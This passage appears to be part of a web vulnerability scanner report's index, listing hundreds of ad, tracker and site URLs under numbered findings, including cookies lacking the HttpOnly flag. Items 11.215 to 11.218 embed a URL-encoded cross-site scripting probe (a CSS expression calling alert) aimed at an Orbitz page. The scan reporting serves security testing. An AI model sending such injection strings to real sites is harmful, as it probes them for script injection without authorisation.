11.201. http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js

11.202. http://pixel.facebook.com/ajax/register/logging.php

11.203. http://pixel.invitemedia.com/data_sync

11.204. http://pixel.mathtag.com/event/js

11.205. http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif

11.206. http://pixel.tree.com/api/image.ashx/collect

11.207. http://pixel.tree.com/pt.ashx

11.208. http://px.admonkey.dapper.net/PixelMonkey

11.209. http://r.casalemedia.com/j.gif

11.210. http://r.openx.net/set

11.211. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/

11.212. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/

11.213. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc

11.214. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588

11.215. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.216. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.217. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.218. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

11.219. http://realestate.msn.com/

11.220. http://realestate.msn.com/slideshow.aspx

11.221. http://sales.liveperson.net/hc/15744040/

11.222. http://scholar.google.com/scholar

11.223. http://segment-pixel.invitemedia.com/set_partner_uid

11.224. http://segment-pixel.invitemedia.com/setuid

11.225. http://showads.pubmatic.com/AdServer/AdServerServlet

11.226. http://showads.pubmatic.com/AdServer/AdServerServlet

11.227. http://showads.pubmatic.com/AdServer/AdServerServlet

11.228. http://showads.pubmatic.com/AdServer/AdServerServlet

11.229. http://showads.pubmatic.com/AdServer/AdServerServlet

11.230. http://showads.pubmatic.com/AdServer/AdServerServlet

11.231. http://showads.pubmatic.com/AdServer/AdServerServlet

11.232. http://showads.pubmatic.com/AdServer/AdServerServlet

11.233. http://sitelife.ehow.com/ver1.0/Direct/Process

11.234. https://sitesearch.omniture.com/center/

11.235. http://social.entertainment.msn.com/bloglist.aspx

11.236. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx

11.237. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx

11.238. http://solutions.liveperson.com/ref/lppb.asp

11.239. http://sorry.google.com/sorry/

11.240. http://sorry.google.com/sorry/Captcha

11.241. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx

11.242. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

11.243. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx

11.244. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

11.245. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

11.246. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

11.247. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx

11.248. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

11.249. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx

11.250. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx

11.251. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

11.252. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

11.253. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

11.254. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

11.255. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

11.256. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

11.257. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

11.258. http://specials.msn.com/IEIncreaseFont_preview.aspx

11.259. http://specials.msn.com/alphabet.aspx

11.260. http://sync.mathtag.com/sync/img

11.261. http://t.invitemedia.com/track_imp

11.262. http://tags.bluekai.com/site/1463

11.263. http://tags.bluekai.com/site/2748

11.264. http://track.roiservice.com/track/track.aspx

11.265. http://tracking.tree.com/trk/npv-event.gif

11.266. http://tracking.tree.com/trk/pv.gif

11.267. http://translate.google.com/translate_t

11.268. http://tv.msn.com/

11.269. http://tv.msn.com/last-night-on-tv/

11.270. http://tv.msn.com/tv/article.aspx

11.271. http://video.google.com/videosearch

11.272. http://vs.dmtracker.com/tags/vs.js

11.273. http://w.ic.tynt.com/b/o

11.274. http://www.bing.com/

11.275. http://www.bing.com/images/results.aspx

11.276. http://www.bing.com/local/ypdefault.aspx

11.277. http://www.bing.com/maps/

11.278. http://www.bing.com/maps/default.aspx

11.279. http://www.bing.com/maps/explore/

11.280. http://www.bing.com/news/results.aspx

11.281. http://www.bing.com/news/search

11.282. http://www.bing.com/news/search

11.283. http://www.bing.com/results.aspx

11.284. http://www.bing.com/search

11.285. http://www.bing.com/shopping

11.286. http://www.bing.com/shopping/pet-beds/c/5533

11.287. http://www.bing.com/shopping/photo-storage-presentation/search

11.288. http://www.bing.com/shopping/search

11.289. http://www.bing.com/shopping/televisions/c/4724

11.290. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

11.291. http://www.bing.com/shopping/womens-workout-clothing/r/146

11.292. http://www.bing.com/travel/content/search

11.293. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do

11.294. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

11.295. http://www.bing.com/travel/hotels

11.296. http://www.bing.com/videos/browse

11.297. http://www.bing.com/videos/results.aspx

11.298. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j

11.299. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

11.300. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7

11.301. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

11.302. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

11.303. http://www.capitalone.com/creditcards/orbitz/index.php

11.304. http://www.cheaptickets.com/

11.305. http://www.demandstudios.com/ehow-writers.html

11.306. http://www.ehow.com/

11.307. http://www.facebook.com/

11.308. http://www.facebook.com/

11.309. http://www.facebook.com/%s

11.310. http://www.facebook.com/2008/fbml

11.311. http://www.facebook.com/MillenniumHotels

11.312. http://www.facebook.com/ajax/intl/language_dialog.php

11.313. http://www.facebook.com/ajax/reg_birthday_help.php

11.314. http://www.facebook.com/badges

11.315. http://www.facebook.com/btaylor

11.316. http://www.facebook.com/campaign/impression.php

11.317. http://www.facebook.com/campaign/landing.php

11.318. http://www.facebook.com/careers/

11.319. http://www.facebook.com/developers

11.320. http://www.facebook.com/directory/pages/

11.321. http://www.facebook.com/directory/people/

11.322. http://www.facebook.com/facebook

11.323. http://www.facebook.com/find-friends

11.324. http://www.facebook.com/help/

11.325. http://www.facebook.com/ligatt

11.326. http://www.facebook.com/mobile

11.327. http://www.facebook.com/omniture

11.328. http://www.facebook.com/orbitz

11.329. http://www.facebook.com/pages/blekko/316217594002

11.330. http://www.facebook.com/platform

11.331. http://www.facebook.com/policy.php

11.332. http://www.facebook.com/privacy/explanation.php

11.333. http://www.facebook.com/r.php

11.334. http://www.facebook.com/recover.php

11.335. http://www.facebook.com/terms.php

11.336. https://www.facebook.com/

11.337. https://www.facebook.com/2008/fbml

11.338. https://www.facebook.com/login.php

11.339. http://www.google.com/finance

11.340. http://www.google.com/setprefs

11.341. http://www.msn.com/

11.342. http://www.omniture.com/de

11.343. http://www.omniture.com/en

11.344. http://www.omniture.com/en/

11.345. http://www.omniture.com/en/community

11.346. http://www.omniture.com/en/community/blogs

11.347. http://www.omniture.com/en/community/events

11.348. http://www.omniture.com/en/community/usergroups

11.349. http://www.omniture.com/en/company/adobe_faq

11.350. http://www.omniture.com/en/company/analyst_insight

11.351. http://www.omniture.com/en/company/customers

11.352. http://www.omniture.com/en/company/press_room

11.353. http://www.omniture.com/en/company/press_room/awards

11.354. http://www.omniture.com/en/company/press_room/news

11.355. http://www.omniture.com/en/company/press_room/press_releases

11.356. http://www.omniture.com/en/contact

11.357. http://www.omniture.com/en/contact/company

11.358. http://www.omniture.com/en/contact/email

11.359. http://www.omniture.com/en/contact/feedback

11.360. http://www.omniture.com/en/contact/offices

11.361. http://www.omniture.com/en/contact/sales

11.362. http://www.omniture.com/en/contact/support

11.363. http://www.omniture.com/en/education

11.364. http://www.omniture.com/en/education/academic_initiative

11.365. http://www.omniture.com/en/education/certification

11.366. http://www.omniture.com/en/education/certification/implementation

11.367. http://www.omniture.com/en/education/certification/insight_analyst

11.368. http://www.omniture.com/en/education/certification/insight_architect

11.369. http://www.omniture.com/en/education/certification/search_center

11.370. http://www.omniture.com/en/education/certification/site_catalyst

11.371. http://www.omniture.com/en/education/certification/support

11.372. http://www.omniture.com/en/education/certification/test_target

11.373. http://www.omniture.com/en/education/courses

11.374. http://www.omniture.com/en/education/courses/discover

11.375. http://www.omniture.com/en/education/courses/dop_analyst

11.376. http://www.omniture.com/en/education/courses/merchandising

11.377. http://www.omniture.com/en/education/courses/online_marketing_suite

11.378. http://www.omniture.com/en/education/courses/sbu

11.379. http://www.omniture.com/en/education/courses/searchcenter

11.380. http://www.omniture.com/en/education/courses/sitesearch

11.381. http://www.omniture.com/en/education/courses/survey

11.382. http://www.omniture.com/en/education/courses/testandtarget

11.383. http://www.omniture.com/en/partners

11.384. http://www.omniture.com/en/partners/apply

11.385. http://www.omniture.com/en/partners/portal

11.386. http://www.omniture.com/en/partners/showcase

11.387. http://www.omniture.com/en/privacy

11.388. http://www.omniture.com/en/privacy/2o7

11.389. http://www.omniture.com/en/privacy/policy

11.390. http://www.omniture.com/en/privacy/product

11.391. http://www.omniture.com/en/privacy/visualsciences

11.392. http://www.omniture.com/en/privacy/visualsciences/policy

11.393. http://www.omniture.com/en/privacy/visualsciences/resources

11.394. http://www.omniture.com/en/privacy/visualsciences/terms

11.395. http://www.omniture.com/en/product_tours/form

11.396. http://www.omniture.com/en/products/conversion

11.397. http://www.omniture.com/en/products/conversion/merchandising

11.398. http://www.omniture.com/en/products/conversion/publish

11.399. http://www.omniture.com/en/products/conversion/recommendations

11.400. http://www.omniture.com/en/products/conversion/searchandpromote

11.401. http://www.omniture.com/en/products/conversion/survey

11.402. http://www.omniture.com/en/products/conversion/testandtarget

11.403. http://www.omniture.com/en/products/conversion/testandtarget11

11.404. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

11.405. http://www.omniture.com/en/products/marketing_integration/genesis

11.406. http://www.omniture.com/en/products/marketing_integration/genesis/applications

11.407. http://www.omniture.com/en/products/multichannel_analytics

11.408. http://www.omniture.com/en/products/multichannel_analytics/insight

11.409. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

11.410. http://www.omniture.com/en/products/online_analytics

11.411. http://www.omniture.com/en/products/online_analytics/digitalpulse

11.412. http://www.omniture.com/en/products/online_analytics/discover

11.413. http://www.omniture.com/en/products/online_analytics/sitecatalyst

11.414. http://www.omniture.com/en/products/online_business_optimization

11.415. http://www.omniture.com/en/products/online_marketing_suite

11.416. http://www.omniture.com/en/products/open_business_analytics_platform

11.417. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

11.418. http://www.omniture.com/en/products/tours

11.419. http://www.omniture.com/en/products/visitor_acquisition

11.420. http://www.omniture.com/en/products/visitor_acquisition/searchcenter

11.421. http://www.omniture.com/en/resources

11.422. http://www.omniture.com/en/resources/articles

11.423. http://www.omniture.com/en/resources/case_studies

11.424. http://www.omniture.com/en/resources/cmo.com

11.425. http://www.omniture.com/en/resources/guides

11.426. http://www.omniture.com/en/resources/testimonials

11.427. http://www.omniture.com/en/resources/webinars

11.428. http://www.omniture.com/en/services

11.429. http://www.omniture.com/en/services/consulting

11.430. http://www.omniture.com/en/services/es

11.431. http://www.omniture.com/en/survey/5084

11.432. http://www.omniture.com/en/surveys

11.433. http://www.omniture.com/es

11.434. http://www.omniture.com/fr

11.435. http://www.omniture.com/jp

11.436. http://www.omniture.com/ko

11.437. http://www.omniture.com/offer/100

11.438. http://www.omniture.com/offer/101

11.439. http://www.omniture.com/offer/102

11.440. http://www.omniture.com/offer/107

11.441. http://www.omniture.com/offer/108

11.442. http://www.omniture.com/offer/158

11.443. http://www.omniture.com/offer/162

11.444. http://www.omniture.com/offer/17

11.445. http://www.omniture.com/offer/170

11.446. http://www.omniture.com/offer/186

11.447. http://www.omniture.com/offer/187

11.448. http://www.omniture.com/offer/191

11.449. http://www.omniture.com/offer/285

11.450. http://www.omniture.com/offer/286

11.451. http://www.omniture.com/offer/291

11.452. http://www.omniture.com/offer/301

11.453. http://www.omniture.com/offer/303

11.454. http://www.omniture.com/offer/323

11.455. http://www.omniture.com/offer/331

11.456. http://www.omniture.com/offer/335

11.457. http://www.omniture.com/offer/337

11.458. http://www.omniture.com/offer/357

11.459. http://www.omniture.com/offer/372

11.460. http://www.omniture.com/offer/400

11.461. http://www.omniture.com/offer/411

11.462. http://www.omniture.com/offer/412

11.463. http://www.omniture.com/offer/413

11.464. http://www.omniture.com/offer/427

11.465. http://www.omniture.com/offer/429

11.466. http://www.omniture.com/offer/435

11.467. http://www.omniture.com/offer/462

11.468. http://www.omniture.com/offer/704

11.469. http://www.omniture.com/offer/892

11.470. http://www.omniture.com/offer/987

11.471. http://www.omniture.com/offer/989

11.472. http://www.omniture.com/press/867

11.473. http://www.omniture.com/press/868

11.474. http://www.omniture.com/zh

11.475. http://www.orbitz.com/

11.476. http://www.orbitz.com/App/DPTLandingPageSearch

11.477. http://www.orbitz.com/App/DisplayCarSearch

11.478. http://www.orbitz.com/App/GDDC

11.479. http://www.orbitz.com/App/Home

11.480. http://www.orbitz.com/App/InitDealEdit

11.481. http://www.orbitz.com/App/PartnerTracking

11.482. http://www.orbitz.com/App/PerformMDLPDealsContent

11.483. http://www.orbitz.com/App/PrepareActivitiesHome

11.484. http://www.orbitz.com/App/PrepareDealsHome

11.485. http://www.orbitz.com/App/PrepareFlightsTab

11.486. http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp

11.487. http://www.orbitz.com/App/PrepareSearchResult

11.488. http://www.orbitz.com/App/PrepareVacationsHome

11.489. http://www.orbitz.com/App/Sitemap

11.490. http://www.orbitz.com/App/SubmitQuickSearch

11.491. http://www.orbitz.com/App/ViewDHTMLCalendar

11.492. http://www.orbitz.com/App/ViewHotelSearch

11.493. http://www.orbitz.com/App/ViewMyAccount

11.494. http://www.orbitz.com/App/ViewRSSHelpPage

11.495. http://www.orbitz.com/App/ViewRoundTripSearch

11.496. http://www.orbitz.com/App/ViewTravelWatchHome

11.497. http://www.orbitz.com/hotels/

11.498. https://www.orbitz.com/Secure/SignIn

11.499. https://www.orbitz.com/Secure/ViewSecureCalendar

11.500. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

11.501. http://www.parentsconnect.com/flux/login_sync.jhtml

11.502. http://www.parentsconnect.com/flux/widgetRedirect.jhtml

11.503. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

11.504. http://www.websitetoolbox.com/tool/view/mb/file

11.505. http://www.worldmastiffforum.com/

11.506. http://www.worldmastiffforum.com/file

11.507. http://www.youtube.com/user/sqlrtfm

11.508. http://xcdn.xgraph.net/15530/db/xg.gif

12. Cookie without HttpOnly flag set

12.1. https://admin.testandtarget.omniture.com/

12.2. https://admin.testandtarget.omniture.com/a

12.3. https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp

12.4. https://admin.testandtarget.omniture.com/login

12.5. https://admin.testandtarget.omniture.com/login_hal.css

12.6. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

12.7. https://admin.testandtarget.omniture.com/skins/omniture/login.css

12.8. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css

12.9. https://admin.testandtarget.omniture.com/user/forgot_password.jsp

12.10. http://advertising.aol.com/privacy/advertisingcom/opt-out

12.11. http://amihackerproof.com/

12.12. http://blekko.com/

12.13. http://blekko.com/ws/http:/2mdn.net/%20/domain

12.14. http://blogs.ittoolbox.com/pm/ppm

12.15. http://boardreader.com/moduleindex.php

12.16. http://brothercake.com/site/resources/scripts/onload/

12.17. http://bugs.jquery.com/ticket/7509

12.18. https://careers.microsoft.com/

12.19. http://ccc01.opinionlab.com/comment_card.asp

12.20. http://ccc01.opinionlab.com/o.asp

12.21. http://clickaider.com/

12.22. http://corp.orbitz.com/

12.23. http://corp.orbitz.com/careers

12.24. http://corp.orbitz.com/partnerships/advertise.html

12.25. http://corp.orbitz.com/partnerships/affiliates.html

12.26. http://cruises.orbitz.com/

12.27. http://dating.msn.com/index.aspx

12.28. http://dating.msn.com/search/index.aspx

12.29. http://dev.twitter.com/

12.30. https://faq.orbitz.com/

12.31. https://faq.orbitz.com/app/answers/detail/a_id/15644

12.32. http://games.msn.com/

12.33. http://hackergearonline.com/

12.34. http://ie6funeral.com/

12.35. http://inforavel.com/ad_type.php

12.36. http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html

12.37. http://leads.demandbase.com/

12.38. http://m.twitter.com/

12.39. http://mad4milk.net/

12.40. http://nationalcybersecurity.com/

12.41. http://outsideonline.com/

12.42. http://pressroom.orbitz.com/

12.43. https://secure.avangate.com/order/checkout.php

12.44. http://solutions.liveperson.com/ref/lppb.asp

12.45. http://sorry.google.com/sorry/Captcha

12.46. http://spoofem.com/

12.47. http://trw.com/

12.48. http://trw.mediaroom.com/index.php

12.49. http://twitter.com/

12.50. http://twitter.com/BWBLLC

12.51. http://twitter.com/BW_Technology

12.52. http://twitter.com/Chester_Pitts

12.53. http://twitter.com/Cirque

12.54. http://twitter.com/JetBlue

12.55. http://twitter.com/JohnsHopkinsSPH

12.56. http://twitter.com/McKQuarterly

12.57. http://twitter.com/MomsWhoSave

12.58. http://twitter.com/NetworkConnects

12.59. http://twitter.com/Nightline

12.60. http://twitter.com/NoReservations

12.61. http://twitter.com/NylonMag

12.62. http://twitter.com/OmnitureEMEA

12.63. http://twitter.com/PeaceCorps

12.64. http://twitter.com/Support

12.65. http://twitter.com/TakeoSpikes51

12.66. http://twitter.com/TomorrowCounsel

12.67. http://twitter.com/VirginiaBeachWk

12.68. http://twitter.com/Wyome655

12.69. http://twitter.com/about

12.70. http://twitter.com/about/contact

12.71. http://twitter.com/about/resources

12.72. http://twitter.com/account/complete

12.73. http://twitter.com/account/resend_password

12.74. http://twitter.com/arnui

12.75. http://twitter.com/ashleytisdale

12.76. http://twitter.com/best_golf

12.77. http://twitter.com/business

12.78. http://twitter.com/buyantsogtoo

12.79. http://twitter.com/chain_llc

12.80. http://twitter.com/chain_llc_cod

12.81. http://twitter.com/chain_llc_mg

12.82. http://twitter.com/cloudscan

12.83. http://twitter.com/coolmompicks

12.84. http://twitter.com/davidgregory

12.85. http://twitter.com/designmilk

12.86. http://twitter.com/donlomb

12.87. http://twitter.com/favorites/toptweets.json

12.88. http://twitter.com/gamespot

12.89. http://twitter.com/home

12.90. http://twitter.com/jasmith579

12.91. http://twitter.com/jobs4writers

12.92. http://twitter.com/ligatt

12.93. http://twitter.com/lijobs_sales

12.94. http://twitter.com/login

12.95. http://twitter.com/millenniumpr

12.96. http://twitter.com/newtwitter

12.97. http://twitter.com/omniture

12.98. http://twitter.com/omniturecare

12.99. http://twitter.com/orbitz

12.100. http://twitter.com/privacy

12.101. http://twitter.com/prolawrssfeed

12.102. http://twitter.com/qianam

12.103. http://twitter.com/rosyresources

12.104. http://twitter.com/sarahdessen

12.105. http://twitter.com/science

12.106. http://twitter.com/scribe

12.107. http://twitter.com/search

12.108. http://twitter.com/sessions/change_locale

12.109. http://twitter.com/sethmeyers21

12.110. http://twitter.com/share

12.111. http://twitter.com/signup

12.112. http://twitter.com/sp_arizona

12.113. http://twitter.com/sp_oregon

12.114. http://twitter.com/sp_tx

12.115. http://twitter.com/toptweets/favorites

12.116. http://twitter.com/tos

12.117. http://twitter.com/widgets

12.118. https://twitter.com/

12.119. https://twitter.com/about

12.120. https://twitter.com/about/contact

12.121. https://twitter.com/about/resources

12.122. https://twitter.com/account/complete

12.123. https://twitter.com/account/resend_password

12.124. https://twitter.com/login

12.125. https://twitter.com/privacy

12.126. https://twitter.com/sessions

12.127. https://twitter.com/sessions/change_locale

12.128. https://twitter.com/sessions/destroy

12.129. https://twitter.com/signup

12.130. https://twitter.com/tos

12.131. http://updates.orbitz.com/

12.132. http://updates.orbitz.com/flight_status

12.133. http://www.amihackerproof.com/

12.134. http://www.answerbag.com/

12.135. https://www.astaro.co.uk/beacon/(beid

12.136. https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1

12.137. https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1

12.138. https://www.astaro.com/user/login

12.139. https://www.astaro.de/beacon/(beid

12.140. http://www.astaro.es/

12.141. https://www.astaro.net/beacon/(beid

12.142. http://www.autocheck.com/

12.143. http://www.bbbonline.org/cks.asp

12.144. http://www.benjaminsterling.com/experiments/jqShuffle/

12.145. http://www.bing.com/travel/

12.146. http://www.bing.com/travel/content/search

12.147. http://www.bing.com/travel/deals/airline-ticket-deals.do

12.148. http://www.cafemom.com/group/416

12.149. http://www.cafemom.com/group/46574

12.150. http://www.directstartv.com/

12.151. http://www.ebookers.com/

12.152. http://www.faneuilhallmarketplace.com/

12.153. http://www.gorp.com/

12.154. http://www.hotelclub.com/

12.155. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

12.156. http://www.kampyle.com/

12.157. http://www.ligattsecurity.com/

12.158. http://www.livestrong.com/

12.159. http://www.milleniumdental.net/

12.160. http://www.mywot.com/en/scorecard/2mdn.net

12.161. http://www.opensource.org/licenses/gpl-license.php

12.162. http://www.opensource.org/licenses/mit-license.php

12.163. http://www.opinionlab.com/ozone/24-7.asp

12.164. http://www.orbitz.com/flight-info/

12.165. http://www.orbitz.com/hotels/

12.166. http://www.orbitz.com/hotels/

12.167. http://www.orbitz.com/hotels/Canada--ON/Toronto/

12.168. http://www.orbitz.com/hotels/France/Nice/

12.169. http://www.orbitz.com/hotels/France/Paris/

12.170. http://www.orbitz.com/hotels/Mexico/

12.171. http://www.orbitz.com/hotels/Mexico/Cancun/

12.172. http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/

12.173. http://www.orbitz.com/hotels/United_Kingdom/London/

12.174. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/

12.175. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/%20

12.176. http://www.orbitz.com/hotels/United_States--CA/San_Diego/

12.177. http://www.orbitz.com/hotels/United_States--CA/San_Francisco/

12.178. http://www.orbitz.com/hotels/United_States--FL/Miami/

12.179. http://www.orbitz.com/hotels/United_States--FL/Orlando/

12.180. http://www.orbitz.com/hotels/United_States--IL/Chicago/

12.181. http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/

12.182. http://www.orbitz.com/hotels/United_States--NY/New_York/

12.183. http://www.orbitz.com/trips/writeReview

12.184. https://www.orbitz.com/account/login

12.185. https://www.orbitz.com/account/registration

12.186. https://www.orbitz.com/trips/writeReview

12.187. http://www.parentsconnect.com/flux/login_sync.jhtml

12.188. http://www.parentsconnect.com/flux/widgetRedirect.jhtml

12.189. http://www.pctools.com/free-antivirus/

12.190. http://www.ratedesi.com/

12.191. http://www.ratestogo.com/

12.192. http://www.thespanner.co.uk/2009/03/25/xss-rays/

12.193. http://www.thespanner.co.uk/feed/

12.194. http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html

12.195. http://www.trw.com/

12.196. http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/

12.197. http://www.webveteran.com/

12.198. http://www.wordpresstemplates.com/

12.199. http://a.intentmedia.net/adServer/clicks

12.200. http://a.intentmedia.net/adServer/impressions

12.201. http://a9.com/-/spec/opensearch/1.1/

12.202. http://ad-emea.doubleclick.net/click

12.203. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59

12.204. http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995

12.205. http://ad.doubleclick.net/adi/N3285.google/B2343920.91

12.206. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3

12.207. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4

12.208. http://ad.doubleclick.net/adi/dmd.ehow/homepage

12.209. http://ad.doubleclick.net/adj/dmd.ehow/gen

12.210. http://ad.doubleclick.net/click

12.211. http://ad.doubleclick.net/clk

12.212. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374

12.213. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082

12.214. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502

12.215. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**

12.216. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**

12.217. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

12.218. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087

12.219. http://ad.yieldmanager.com/iframe3

12.220. http://ad.yieldmanager.com/imp

12.221. http://ad.yieldmanager.com/pixel

12.222. http://adclick.g.doubleclick.net/aclk

12.223. http://ads.adbrite.com/adserver/vdi/762701

12.224. http://ads.revsci.net/adserver/ako

12.225. https://adwords.google.com/select/Login

12.226. http://api.bizographics.com/v1/profile.json

12.227. http://b.scorecardresearch.com/b

12.228. http://blog.facebook.com/blog.php

12.229. http://blog.orbitz.com/

12.230. http://blogsearch.google.com/blogsearch

12.231. http://books.google.com/

12.232. http://books.google.com/books

12.233. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

12.234. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx

12.235. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx

12.236. http://businessonmain.msn.com/questions/default.aspx

12.237. http://businessonmain.msn.com/videos/coolrunnings.aspx

12.238. http://c.chango.com/collector/tag.js

12.239. http://c.statcounter.com/t.php

12.240. http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy

12.241. http://cms.ad.yieldmanager.net/v1/cms

12.242. http://code.google.com/apis/maps/terms.html

12.243. http://code.google.com/p/swfobject/

12.244. http://code.google.com/p/swfobject/wiki/documentation

12.245. http://consumershealthyliving.com/clinical-study.html

12.246. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

12.247. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp

12.248. http://cspix.media6degrees.com/orbserv/hbpix

12.249. http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif

12.250. http://ctix8.cheaptickets.com/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif

12.251. http://ctix8.cheaptickets.com/dcsza35es100004br3bqwfzxk_6e6k/dcs.gif

12.252. http://deals.msn.com/

12.253. http://developer.yahoo.com/yui/compressor/

12.254. http://developers.facebook.com/plugins/

12.255. http://dlvr.it/Djx2v

